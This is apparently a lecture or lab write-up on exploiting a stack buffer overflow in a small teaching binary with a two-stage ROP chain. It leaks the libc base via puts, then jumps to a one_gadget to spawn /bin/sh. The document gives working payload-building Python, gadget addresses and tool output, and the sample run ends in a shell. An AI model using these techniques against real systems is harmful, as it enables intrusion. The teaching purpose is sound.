An example of exploitation using ROP

This example demonstrates some key techniques in exploiting a stack-based buffer overflow vulnerability to launch a shell using ROP. There are three files included:

basic_rop.c: the source code for the target binary.
basic_rop: the target binary.
rop.py: the solution script (in Python).

To make the problem slightly more interesting, we require ASLR to be enabled, so the libc base address (and the buffer address) are randomized on every run.

Analysis

The target binary basic_rop is a simple program that prints a string, reads a line of input from the user and echoes it back. There is an obvious vulnerability in the main() function: it allocates an 8-byte buffer on the stack of main(), but reads up to 64 bytes into it. This lets us overwrite the saved return address and potentially execute arbitrary code.

The binary does not have the stack guard enabled, and is a non-PIE binary, as can be seen from the output of checksec.

[*] '/home/user1/lectures/rop/basic_rop'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

It is also dynamically linked, so we know that the addresses of libc functions are written into the GOT when they are resolved (after the first call to each function).

The stack is, however, non-executable, so we can't simply inject shellcode there. This leaves us with the only option of reusing existing code in the executable segments of the process. There are two possible places to find such code: the binary itself and the libraries it loads (libc or ld). Using code already in the binary is the preferred option here: it is a non-PIE binary, so the addresses of its instructions are fixed and do not change between runs.

But before we start crafting a ROP chain to launch a shell, we have to figure out how far the return address is from the start of the buffer. We can do this statically (e.g., by examining the disassembly of the binary) or dynamically (e.g., using gdb). We will use the latter, just to demonstrate a particularly common technique for finding the offset of the return address using de Bruijn sequences.

Determining the return address offset

You can skip this section if you are not interested in this particular technique of using de Bruijn sequences. The binary is simple enough that the offset can be determined by a quick look at the disassembly.

A de Bruijn sequence with a period of N is a string such that every substring of length N occurs in the string exactly once. This means in particular that given a substring of length N, we can determine exactly its offset relative to the start of the string.

For our example, we will generate a de Bruijn string with period 8. If we overflow the buffer with such a sequence and it overwrites the stored RBP or the stored return pointer, the 8 bytes that end up in that slot identify a unique position in the input, so we can determine the slot's offset from the start of the buffer by examining the overwritten value.

We can use either pwntools or gef to generate de Bruijn sequences. We show here an example using pwntools.

>>> from pwn import *
>>> cyclic(64, n=8)
b'aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaa'
>>>

This generates a string of length 64, with a period of 8 (so every substring of length 8 is unique).
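For readers without pwntools at hand, the construction can be sketched with the standard library alone. The helper names de_bruijn and cyclic_pattern are illustrative and not part of any library; the sketch uses the usual Lyndon-word recursion over the lowercase alphabet, which is assumed here to mirror what cyclic() does.

```python
from itertools import islice
from string import ascii_lowercase


def de_bruijn(alphabet, n):
    """Lazily yield the symbols of a de Bruijn sequence of order n."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            # A complete word has been built; emit it if its period divides n.
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic_pattern(length, n=8):
    """Return the first `length` bytes of the order-n sequence."""
    return "".join(islice(de_bruijn(ascii_lowercase, n), length)).encode()


pattern = cyclic_pattern(64, n=8)
print(pattern)
```

Because the sequence is generated lazily, only the first 64 symbols are ever computed, even though the full order-8 sequence over 26 letters is far too long to materialize.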

We then use this string as input in a gdb session to figure out the return address offset. We set a breakpoint right after the call to fgets (its address is determined by looking at the disassembly of basic_rop) and input the de Bruijn sequence we generated above.

gef➤  break *0x401186
gef➤  run
gef➤  
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaa
gef➤  x/gx $rbp
0x7fffffffe070: 0x6161616161616162

We see that the stored RBP has been overwritten. The pattern search command in GEF tells us the offset of this pattern, 0x6161616161616162, in the input we provided.

gef➤  pattern search 0x6161616161616162
[+] Searching for '6261616161616161'/'6161616161616162' with period=8
[+] Found at offset 8 (little-endian search) likely

GEF tells us that the stored RBP is stored 8 bytes above the buffer address, which means that the return address is stored at 16 bytes above the buffer. We'll use this information to construct our payload later.
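The same lookup can be reproduced by hand, which makes it clear what the pattern search is doing. The following is a minimal sketch using only the standard library; the variable names are illustrative. It packs the overwritten RBP value as little-endian bytes and searches for them in the input string.

```python
import struct

# The de Bruijn string that was fed to the program.
pattern = b"aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaa"

# Value observed at $rbp in the gdb session.
saved_rbp = 0x6161616161616162

# x86-64 is little-endian, so the value is stored in memory as b"baaaaaaa".
needle = struct.pack("<Q", saved_rbp)

rbp_offset = pattern.find(needle)   # offset of the stored RBP from the buffer start
ret_offset = rbp_offset + 8         # the return address sits right above the stored RBP

print(needle, rbp_offset, ret_offset)
```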

Exploitation

The first hurdle in creating a payload that launches a shell is that it typically requires a syscall gadget, but no such gadgets are present in the basic_rop binary. For example:

$ ROPgadget --binary ./basic_rop | grep syscall

does not show anything. There are plenty of syscall gadgets in libc, but to use them we need to know the libc base address, and since ASLR is enabled, this base changes with every run. So we first exploit the buffer overflow bug to leak the libc base address (stage 1), and then, knowing the libc base, craft a ROP chain to execute /bin/sh (stage 2).

Stage 1: Leaking the libc base

The idea is quite simple: we call puts to output its own (real) address. Since this binary is dynamically linked and non-PIE, we know precisely where the real address of puts is stored: in the GOT entry for puts in the .got.plt section. To initiate a call to puts, we use its address in the .plt section (actually it's in .plt.sec for this binary). Both the GOT entry and the PLT address of puts can be found with a simple objdump command:

$ objdump -M intel -dj .plt.sec basic_rop

basic_rop:     file format elf64-x86-64

Disassembly of section .plt.sec:

0000000000401050 <puts@plt>:
  401050:       f3 0f 1e fa             endbr64 
  401054:       f2 ff 25 bd 2f 00 00    bnd jmp QWORD PTR [rip+0x2fbd]        # 404018 <puts@GLIBC_2.2.5>
  40105b:       0f 1f 44 00 00          nop    DWORD PTR [rax+rax*1+0x0]

...

So to print the real address of puts, we call puts@plt, setting its argument to point to its GOT entry 0x404018.
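The GOT address in the objdump comment can be checked by hand: the jmp is RIP-relative, so its target slot is the address of the next instruction plus the displacement. A small worked example, with all numbers taken from the disassembly above and illustrative constant names:

```python
# bnd jmp QWORD PTR [rip+0x2fbd] starts at 0x401054 and is 7 bytes long
# (f2 ff 25 bd 2f 00 00), so rip points at 0x40105b when it executes.
JMP_ADDR = 0x401054
JMP_LEN = 7
DISPLACEMENT = 0x2FBD

next_instruction = JMP_ADDR + JMP_LEN
puts_got = next_instruction + DISPLACEMENT

print(hex(next_instruction), hex(puts_got))
```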

Since this is a 64-bit binary, by the Linux calling convention for x86-64, this argument must be loaded into the rdi register, so we will need to find a ROP gadget to do that (and it can't be in libc -- we still don't have the libc base!).

Fortunately, there is a pop rdi gadget in the basic_rop binary itself:

$ ROPgadget --binary basic_rop | grep 'pop rdi ; ret'
0x0000000000401203 : pop rdi ; ret

So we can now construct a payload to overflow the buffer and print the address of puts. The stack configuration after the overflow should look something like this:

[puts@plt address (0x401050) ]
[GOT entry of puts (0x404018)]
[pop rdi gadget (0x401203)   ]  -->  return address location
[16 bytes of padding         ] 
-----------------------------------  start of buffer

This payload will overflow the buffer and overwrite the return address of main() with the pop rdi gadget, so when main() returns, it will trigger the ROP chain to print the puts address in libc.

Once we get the address of puts, we can find the libc base by subtracting from it the offset of puts relative to the libc base. This offset is fixed for a given libc build, and can be found by looking up the puts symbol in the libc file (e.g., using the pwnlib.elf library -- see the exploit code).
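As a worked example of this arithmetic, the sketch below parses a leaked line and recovers the base, using the addresses printed in the sample run at the end of this write-up. The offset 0x84420 is an assumption derived from that run (0x7fcc443d9420 - 0x7fcc44355000); in a real exploit it should be read from the libc file. The helper name parse_leak is illustrative.

```python
import struct

# Assumption: offset of puts in this particular libc, derived from the sample run.
PUTS_OFFSET = 0x84420


def parse_leak(line: bytes) -> int:
    """Turn the bytes printed by puts (address bytes plus newline) into an integer."""
    raw = line.rstrip(b"\n")
    # puts stops at the first NUL byte, so the two zero high bytes are missing.
    return struct.unpack("<Q", raw.ljust(8, b"\x00"))[0]


# Simulate what the program would print for the puts address in the sample run.
leaked_line = struct.pack("<Q", 0x7FCC443D9420)[:6] + b"\n"

puts_addr = parse_leak(leaked_line)
libc_base = puts_addr - PUTS_OFFSET

print(hex(puts_addr), hex(libc_base))
```

A quick sanity check is that the computed base should be page-aligned, i.e. its low 12 bits are zero.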

Note, however, that we don't want the exploit to end here: if the program exits, libc will be loaded at a different address on the next run, so the address we leaked will be useless for the second stage. Instead, we want to launch the second stage in the same run of the program. The trick is to add the address of main() at the end of the ROP chain, so that after the libc address is leaked, main() starts again and lets us perform another overflow, this time equipped with the knowledge of the libc base. So the actual Stage 1 payload is:

[main() address              ]
[puts@plt address (0x401050) ]
[GOT entry of puts (0x404018)]
[pop rdi gadget (0x401203)   ]  -->  return address location
[16 bytes of padding         ] 
-----------------------------------  start of buffer
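The diagram can be turned into bytes as follows. This is a minimal sketch using only the standard library rather than the actual rop.py; the function name build_stage1 is illustrative, and the address of main() is not given in this write-up, so the value used below is a clearly hypothetical placeholder.

```python
import struct

POP_RDI = 0x401203    # pop rdi ; ret
PUTS_GOT = 0x404018   # GOT entry of puts
PUTS_PLT = 0x401050   # puts@plt
RET_OFFSET = 16       # distance from the buffer start to the return address


def build_stage1(main_addr: int) -> bytes:
    """Padding followed by the chain: pop rdi; puts(puts@got); main()."""
    chain = [POP_RDI, PUTS_GOT, PUTS_PLT, main_addr]
    return b"A" * RET_OFFSET + b"".join(struct.pack("<Q", v) for v in chain)


# Hypothetical placeholder: look up the real address of main in the binary.
HYPOTHETICAL_MAIN = 0x401156

payload = build_stage1(HYPOTHETICAL_MAIN)
print(len(payload), payload)
```

The stack diagram lists the highest address first, whereas the payload is written from the buffer start upward, so the order in the list is reversed relative to the diagram.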

Stage 2: launching shell

After a successful attack at Stage 1, we will have the libc base, and we have triggered the (re-)execution of the main function. Now our goal is to overflow the buffer in main() again, but with a different ROP chain, aimed to launch a shell.

We could construct a ROP chain manually to make an execve syscall with the argument /bin/sh, but this is such a common task in exploitation that there is already a tool that finds a ready-made gadget for us -- the one_gadget tool. Running this tool on libc, we find:

$ one_gadget /lib/x86_64-linux-gnu/libc-2.31.so 
0xe3afe execve("/bin/sh", r15, r12)
constraints:
  [r15] == NULL || r15 == NULL || r15 is a valid argv
  [r12] == NULL || r12 == NULL || r12 is a valid envp

0xe3b01 execve("/bin/sh", r15, rdx)
constraints:
  [r15] == NULL || r15 == NULL || r15 is a valid argv
  [rdx] == NULL || rdx == NULL || rdx is a valid envp

0xe3b04 execve("/bin/sh", rsi, rdx)
constraints:
  [rsi] == NULL || rsi == NULL || rsi is a valid argv
  [rdx] == NULL || rdx == NULL || rdx is a valid envp

The command shows three possible "one gadgets". The "constraints" under each gadget describe the conditions that must hold for that gadget to execute successfully. For example, the first one_gadget, located at offset 0xe3afe from the libc base, executes execve("/bin/sh", r15, r12). Each of the two registers must independently satisfy one of three conditions: (1) it points to a NULL value, (2) it is itself NULL, or (3) it points to a valid array (argv for r15, envp for r12).

So we have to make sure these constraints hold when the gadget is executed. The simplest way is to use another gadget to set both r12 and r15 to NULL. There happens to be such a gadget in basic_rop:

$ ROPgadget --binary basic_rop | grep 'pop r15' | grep 'pop r12'
0x00000000004011fc : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004011fb : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret

The gadget we want is the one at 0x4011fc. It does a bit more than pop stack elements into r12 and r15: it also pops into r13 and r14. So to use this gadget, we need to place 4 elements (32 bytes) above it on the stack, one for each pop.

The second stage payload should therefore look like the following:

[one_gadget (libc_base + 0xe3afe)   ]
[32 bytes of 0x00                   ]
[pop r12 to r15 gadget (0x4011fc)   ]  -->  return address location
[16 bytes of padding                ]
------------------------------------------  start of buffer
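The second stage can be assembled the same way as the first. This is again a standard-library sketch rather than the actual rop.py, with an illustrative function name. It uses the four-pop gadget at 0x4011fc from the ROPgadget output (pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret) and, for the example call, the libc base from the sample run.

```python
import struct

POP_R12_R13_R14_R15 = 0x4011FC   # pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
ONE_GADGET_OFFSET = 0xE3AFE      # execve("/bin/sh", r15, r12)
RET_OFFSET = 16                  # distance from the buffer start to the return address


def build_stage2(libc_base: int) -> bytes:
    """Padding, then zero r12..r15, then jump to the one_gadget in libc."""
    chain = [
        POP_R12_R13_R14_R15,
        0, 0, 0, 0,                       # values popped into r12, r13, r14, r15
        libc_base + ONE_GADGET_OFFSET,
    ]
    return b"A" * RET_OFFSET + b"".join(struct.pack("<Q", v) for v in chain)


# Example with the libc base printed in the sample run.
payload = build_stage2(0x7FCC44355000)
print(len(payload), payload)
```

The resulting payload is 64 bytes long, so it just fits within the 64-byte input limit described in the analysis.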

The entire attack has been automated in a Python script (rop.py). Running it gets us the shell.

$ python3 rop.py
[*] '/home/user1/lectures/rop/basic_rop'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[*] '/lib/x86_64-linux-gnu/libc-2.31.so'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Starting local process './basic_rop': pid 24532
b'Hello, type something\n'
b'AAAAAAAAAAAAAAAA\x03\x12@\n'
puts address: 0x7fcc443d9420
libc base: 0x7fcc44355000
b'Hello, type something\n'
[*] Switching to interactive mode
$ ls
README.md  basic_rop  basic_rop.c  rop.py
$